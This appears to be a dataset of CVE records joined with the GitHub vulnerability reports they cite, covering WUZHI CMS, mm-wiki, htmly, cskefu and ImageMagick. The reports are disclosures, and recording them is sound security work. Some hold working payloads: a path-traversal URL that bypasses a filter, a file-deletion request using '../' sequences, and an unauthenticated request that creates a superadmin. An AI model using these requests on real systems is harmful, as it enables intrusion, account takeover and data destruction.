{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cigar-Fasion/CVE/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/202" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cigar-Fasion/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/202" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/wuzhicms/wuzhicms/issues/202
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
A directory traversal vulnerability was discovered in WUZHI CMS 4.1.0. Directory traversal allows authenticated remote attackers to list files in any directory. Vulnerability in /coreframe/app/attachment/admin/index.php: ``` public function dir() { $dir = isset($GLOBALS['dir']) && trim($GLOBALS['dir']) ? str_replace(array('..\\', '../', './', '.\\'), '', trim($GLOBALS['dir'])) : ''; $dir = str_ireplace(array('%2F', '//'), '/', $dir); $lists = glob(ATTACHMENT_ROOT . $dir . '/' . '*'); if (!empty($lists)) rsort($lists); $cur_dir = str_replace(array(WWW_ROOT, DIRECTORY_SEPARATOR . DIRECTORY_SEPARATOR), array('', DIRECTORY_SEPARATOR), ATTACHMENT_ROOT . $dir . '/'); include $this->template('dir', M); } ``` Even if the "str_replace" function filters some characters, it can still bypass the blacklist with ".....///" 1.Log in as admin ![image](https://user-images.githubusercontent.com/57355558/178402193-9f2a7884-3e5f-4b7d-b82a-b19a5a874b29.png) 2.Vulnerability trigger point `http://www.test.com/index.php?m=attachment&f=index&_su=wuzhicms&v=dir&dir=/.....///.....///.....///.....///` ![image](https://user-images.githubusercontent.com/57355558/178402374-02b63c36-c778-42b7-8b5d-003c60ff2732.png)
Wuzhicms v4.1.0 /coreframe/app/attachment/admin/index.php hava a directory traversal Vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/202/comments
1
2022-07-12T03:28:46Z
2023-01-08T02:20:43Z
https://github.com/wuzhicms/wuzhicms/issues/202
1,301,485,949
202
4,053
CVE-2021-39393
2022-08-26T13:15:08.300
mm-wiki v0.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the markdown editor.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/phachon/mm-wiki/issues/315" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/phachon/mm-wiki/issues/315" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mm-wiki_project:mm-wiki:0.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B14C3277-7618-436B-B961-C0A2673B87CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phachon/mm-wiki/issues/315
[ "Exploit", "Third Party Advisory" ]
github.com
[ "phachon", "mm-wiki" ]
xxxxxHere is the problem descriptionxxxx 1. The version number in use vx0.2.1 2. Whether the version has been upgraded to the new version yes 3. Current problems encountered: The markdown editor exist a XSS 4. Error logs or screenshots Insert the XSS-payload into it ![图片](https://user-images.githubusercontent.com/83812544/129649686-1888f9bb-31cb-4a4b-9953-196a31ab4cbb.png) ![图片](https://user-images.githubusercontent.com/83812544/129649794-b0dd9fab-0e46-42d3-a765-0cb87476eb11.png) 5. How to repair Filter user input and add http-only ...
The markdown editor exist a XSS
https://api.github.com/repos/phachon/mm-wiki/issues/315/comments
0
2021-08-17T01:39:32Z
2021-08-17T01:39:32Z
https://github.com/phachon/mm-wiki/issues/315
972,222,792
315
4,054
CVE-2021-39394
2022-08-26T13:15:08.357
mm-wiki v0.2.1 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add user accounts and modify user information.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phachon/mm-wiki/issues/316" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phachon/mm-wiki/issues/316" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mm-wiki_project:mm-wiki:0.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B14C3277-7618-436B-B961-C0A2673B87CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/phachon/mm-wiki/issues/316
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phachon", "mm-wiki" ]
xxxxxHere is the problem descriptionxxxx The version number in use vx0.2.1 Whether the version has been upgraded to the new version yes Current problems encountered: CSRF vulnerabilities Error logs or screenshots 1. Click to modify personal information and capture it ![图片](https://user-images.githubusercontent.com/83812544/129831791-4f9f9c11-477b-420b-a0c6-51c853af381a.png) 2. Generate CSRF payload(mobile modified to 123123) ![图片](https://user-images.githubusercontent.com/83812544/129831191-5030e523-f88a-4d63-a7d7-0aa7d3c49e2b.png) 3. Click submit ![图片](https://user-images.githubusercontent.com/83812544/129831354-80e1db00-3775-42a8-8317-972fd90a0a3b.png) ![图片](https://user-images.githubusercontent.com/83812544/129831421-f05a9400-aad0-46e5-98dc-3b42e2a5763c.png) 4. refresh ![图片](https://user-images.githubusercontent.com/83812544/129831625-0b193d2f-2f68-47d0-b6e1-d47cbc5eb882.png) 5. If you're logged in as a administrator ,through this vulnerability can add any user: ![image](https://user-images.githubusercontent.com/83812544/129834243-2515b4a9-e7c8-40dc-8f44-91e15345b67f.png) ![image](https://user-images.githubusercontent.com/83812544/129834266-7f9ca8a0-6b80-4d0a-896d-5c057c3f7270.png) ![image](https://user-images.githubusercontent.com/83812544/129834316-10fa47f0-d0c8-465b-95eb-d49a888a2a2b.png)
CSRF vulnerabilities
https://api.github.com/repos/phachon/mm-wiki/issues/316/comments
0
2021-08-18T03:22:30Z
2021-08-18T03:54:22Z
https://github.com/phachon/mm-wiki/issues/316
973,236,101
316
4,055
CVE-2021-40285
2022-08-26T13:15:08.397
htmly v2.8.1 was discovered to contain an arbitrary file deletion vulnerability via the component \views\backup.html.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/danpros/htmly/issues/462" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/danpros/htmly/issues/462" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmly:htmly:2.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "3943A5AA-F6A1-40B4-AFD3-7D1189668464", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/danpros/htmly/issues/462
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "danpros", "htmly" ]
Hi there, I found an arbitrary file deletion vulnerability in Htmly. **Proof of Concept:** tested on Windows7 and Htmly version 2.8.1 and 2.8.0 1. Log in to the dashboard,click **Tools** -->**Backup**-->**create backup** to create backup. 2. Arbitrary file deletion: click **Delete** and modify the file parameter. payload: GET /htmly1/admin/backup?file=htmly_2021-05-12-09-33-30.zip/../../../../../../windows/win.ini&submit=Delete ![1](https://user-images.githubusercontent.com/34636478/117944977-6e048180-b340-11eb-89b9-6be4df23af47.png) ![2](https://user-images.githubusercontent.com/34636478/117945032-7e1c6100-b340-11eb-9fee-7afd71034e8d.png) ![3](https://user-images.githubusercontent.com/34636478/117945046-84124200-b340-11eb-8918-01a98b0bec83.PNG) ![4](https://user-images.githubusercontent.com/34636478/117945624-16b2e100-b341-11eb-94a6-b4f8041dbb2e.png) ![5](https://user-images.githubusercontent.com/34636478/117945639-19add180-b341-11eb-9a1b-fcea086d277e.png)
Security Issue: arbitrary file deletion vulnerability in “\system\admin\views\backup.html.php”
https://api.github.com/repos/danpros/htmly/issues/462/comments
4
2021-05-12T08:45:43Z
2022-09-30T01:18:21Z
https://github.com/danpros/htmly/issues/462
889,834,459
462
4,056
CVE-2022-36521
2022-08-26T14:15:08.353
Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chatopera/cskefu/issues/724" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chatopera/cskefu/issues/724" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cskefu:cskefu:7.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "6801701E-47D9-4EE6-913D-6FE780D5C3FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "306" ]
306
https://github.com/chatopera/cskefu/issues/724
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chatopera", "cskefu" ]
<!-- 致工单作者: 以这样的设想:读完您的工单,是一个心情愉悦的状态。 为此,您的工单应该是一个故事,徐徐展开:开头有悬念,能读到结尾;有时间、地点、人物、问题;有可能的解决方案。 您的描述越具体,越有人愿意帮助。因为您的一个不起眼的线索,可能就让读者快速的分析和解决问题。 如果工单的内容,没有具体、没有背景、没有截图、没有日志的话,也就没有人愿意解决。 每个工单,应花至少半个小时进行撰写。就算是对春松客服熟悉,对业务熟悉,写作技能上乘,也是这样。 写出一个好的工单,可能会花一天的时间,还可能更长。 就一项别人可以参与进来合作的事情而言,对方可能要花的时间可能是几周,几个月。 --> ## 概述 存在添加管理员接口,调用该接口时没有对当前用户进行校验,导致未登录状态下可添加管理员账户。 There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in. **数据包(payload):** ``` java GET /addAdmin?username=admin666&password=admin666123&email=admin666@admin6666.com&mobile=17777777776&superadmin=true HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Cache-Control: max-age=0 ``` ** 测试截图(Test screenshot): ** ![image](https://user-images.githubusercontent.com/34911111/179440566-1f4cbd45-bdea-48e6-84ba-a2761f99e094.png) 根据给出的URL According to the given URL http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on 跳转至管理界面 Jump to the management interface ![image](https://user-images.githubusercontent.com/34911111/179440612-08cb67d1-633d-41e5-8b53-2d56fc9efc74.png) **漏洞分析(Vulnerability analysis)** 漏洞源码(Vulnerability source code): ```java @RequestMapping("/addAdmin") @Menu(type = "apps", subtype = "user", access = true) public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) { String msg = ""; msg = validUser(user); if (StringUtils.isNotBlank(msg)) { return request(super.createView("redirect:/register.html?msg=" + msg)); } else { user.setUname(user.getUsername()); user.setAdmin(true); if (StringUtils.isNotBlank(user.getPassword())) { user.setPassword(MainUtils.md5(user.getPassword())); } user.setOrgi(super.getOrgi()); userRepository.save(user); } ModelAndView view = this.processLogin(request, user, ""); return view; } private String validUser(User user) { String msg = ""; User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false); if (tempUser != null) { msg = "username_exist"; return msg; } tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false); if (tempUser != null) { msg = "email_exist"; return msg; } tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false); if (tempUser != null) { msg = "mobile_exist"; return msg; } return msg; } ``` addAdmin接口未进行权限校验,未登录状态可直接调用 The addadmin interface does not perform permission verification, and can be called directly in the unregistered state 增加用户前,判断传入的用户是否有效 Before adding users, judge whether the incoming users are valid ![image](https://user-images.githubusercontent.com/34911111/179440638-6a865cf9-7f03-4189-9040-373f0ca0b360.png) 为了顺利到达最后一个return,传入的username,email,mobile都必须为数据库中的唯一值 n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database ![image](https://user-images.githubusercontent.com/34911111/179440649-b65d06c9-203a-4938-b4af-50e7d4c24ffe.png) 当返回的msg为空时,我们就可以继续增加用户的操作,且将添加的用户设置为管理员 When the returned MSG is empty, we can continue to add users and set the added users as administrators ![image](https://user-images.githubusercontent.com/34911111/179440672-d4f789e4-29a0-4f40-aeec-052e23b97696.png) ## 操作系统 - [ ] macOS or Mac OSX - [ ] Windows - [ ] Linux(Debian, CentOS, Ubuntu, etc.) ## 代码版本 <!-- Git commit hash (`git rev-parse HEAD`),进入代码库并执行 --> 代码版本 <= 7.0.1 ## 祝福与不祝福 春松客服之所以开源,是基于这样一种信念:爱人也是爱己,利他也是利己。 对人和人美好关系的向往,对人潜力的信任。让我们相信因春松客服而受益的人,会回报给春松客服开源社区,我们[所有贡献者](https://github.com/chatopera/cskefu#%E8%B4%A1%E7%8C%AE%E8%80%85%E5%88%97%E8%A1%A8-)基于共赢的信念合作。 回报方式包括:[提交 PR](https://github.com/chatopera/cskefu/blob/osc/CONTRIBUTING.md)、购买春松客服相关的[付费产品和服务](https://www.chatopera.com/price.html)等。 因春松客服受益,而不回报开源社区的用户,我们不欢迎使用春松客服:我们开源并不是为了你们,你们是不被祝福的。 ## Open Source for the World [![banner][co-banner-image]][co-url] [co-banner-image]: https://user-images.githubusercontent.com/3538629/159913838-fbed2a14-a735-45b3-9e48-4727780a0d96.png [co-url]: https://www.chatopera.com
【安全漏洞】前台未授权增加管理员账号
https://api.github.com/repos/cskefu/cskefu/issues/724/comments
1
2022-07-18T03:21:46Z
2022-10-30T10:24:15Z
https://github.com/cskefu/cskefu/issues/724
1,307,348,918
724
4,057
CVE-2021-3574
2022-08-26T16:15:08.943
A vulnerability was found in ImageMagick-7.0.11-5, where executing a crafted file with the convert command, ASAN detects memory leaks.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c6ad94fbb7b280f39c2fbbdc1c140e51b1b466e9" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/3540" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/cd7f9fb7751b0d59d5a74b12d971155caad5a792" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Q6MJAMGHGB552KSFTQKXEKJVQNM4MCT/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5C6XAGUFPUF4SNVCI2T4OJK3EFIENBGP/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNVDNM4ZEIYPT3SLZHPYN7OG4CZLEXZJ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c6ad94fbb7b280f39c2fbbdc1c140e51b1b466e9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/3540" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/cd7f9fb7751b0d59d5a74b12d971155caad5a792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Q6MJAMGHGB552KSFTQKXEKJVQNM4MCT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5C6XAGUFPUF4SNVCI2T4OJK3EFIENBGP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNVDNM4ZEIYPT3SLZHPYN7OG4CZLEXZJ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.11-5:*:*:*:*:*:*:*", "matchCriteriaId": "3769F997-3EBC-4222-B3D4-8709A7AA49FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/3540
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites I have written a descriptive issue title I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported I have verified that I am using the latest version of ImageMagick ### ImageMagick version 7.0.11-5 ### Operating system Linux ### Operating system, version and so on Ubuntu 18.04, 64bit ### Description When we execute the convert command, asan reports the error LeakSanitizer: detected memory leaks. ### Steps to Reproduce ## Command please run a following cmd with poc file. [POC](https://github.com/NISL-SecurityGroup/NISL-BugDetection/blob/main/project/ImageMagick/memory_leaks/magick-memory_leaks) ```$ magick convert $poc out.bmp``` ## Result Here's ASAN report: ``` convert: Invalid TIFF directory; tags are not sorted in ascending order. `TIFFReadDirectoryCheckOrder' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 4096 (0x1000) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Nonstandard tile width 17990, convert file. `id:000006,sig:09,src:000052,time:16507786,op:flip1,pos:23' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 29255 (0x7247) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 63745 (0xf901) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 0 (0x0) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: IO error during reading of "Tag 4096"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: ASCII value for tag "DocumentName" contains null byte in value; value incorrectly truncated during reading due to implementation limitations. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Incorrect count for "XResolution"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Incorrect count for "YResolution"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Sum of Photometric type-related color channels and ExtraSamples doesn't match SamplesPerPixel. Defining non-color channels as ExtraSamples.. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: MaximumChannelsExceeded `id:000006,sig:09,src:000052,time:16507786,op:flip1,pos:23' @ error/tiff.c/ReadTIFFImage/1734. convert: NoImagesDefined `out.bmp' @ error/convert.c/ConvertImageCommand/3322. ================================================================= ==9304==ERROR: LeakSanitizer: detected memory leaks Direct leak of 152 byte(s) in 1 object(s) allocated from: #0 0x7fedc6aff517 in malloc (/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x55643dee6ca6 in AcquireMagickMemory MagickCore/memory.c:558 #2 0x55643dee6ccc in AcquireCriticalMemory MagickCore/memory.c:634 #3 0x55643e5a3d32 in AcquireQuantumInfo MagickCore/quantum.c:119 #4 0x55643e309aa6 in ReadTIFFImage coders/tiff.c:1672 #5 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #6 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #7 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #8 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #9 0x55643deb10fd in MagickMain utilities/magick.c:149 #10 0x55643deb13a8 in main utilities/magick.c:180 #11 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 14922012 byte(s) in 28 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643dee69c8 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x55643dee6be8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x55643dee7348 in AcquireVirtualMemory MagickCore/memory.c:746 #4 0x55643e5a40b4 in AcquireQuantumPixels MagickCore/quantum.c:177 #5 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #6 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #7 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #8 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #9 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #10 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #11 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #12 0x55643deb10fd in MagickMain utilities/magick.c:149 #13 0x55643deb13a8 in main utilities/magick.c:180 #14 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 115584 byte(s) in 28 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643dee69c8 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x55643dee6be8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x55643dee7137 in AcquireVirtualMemory MagickCore/memory.c:737 #4 0x55643e5a40b4 in AcquireQuantumPixels MagickCore/quantum.c:177 #5 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #6 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #7 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #8 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #9 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #10 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #11 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #12 0x55643deb10fd in MagickMain utilities/magick.c:149 #13 0x55643deb13a8 in main utilities/magick.c:180 #14 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 224 byte(s) in 1 object(s) allocated from: #0 0x7fedc6aff517 in malloc (/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x55643dee6ca6 in AcquireMagickMemory MagickCore/memory.c:558 #2 0x55643dee6f29 in AcquireQuantumMemory MagickCore/memory.c:676 #3 0x55643e5a3f68 in AcquireQuantumPixels MagickCore/quantum.c:165 #4 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #5 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #6 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #7 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #8 0x55643e3c98df in ReadImages 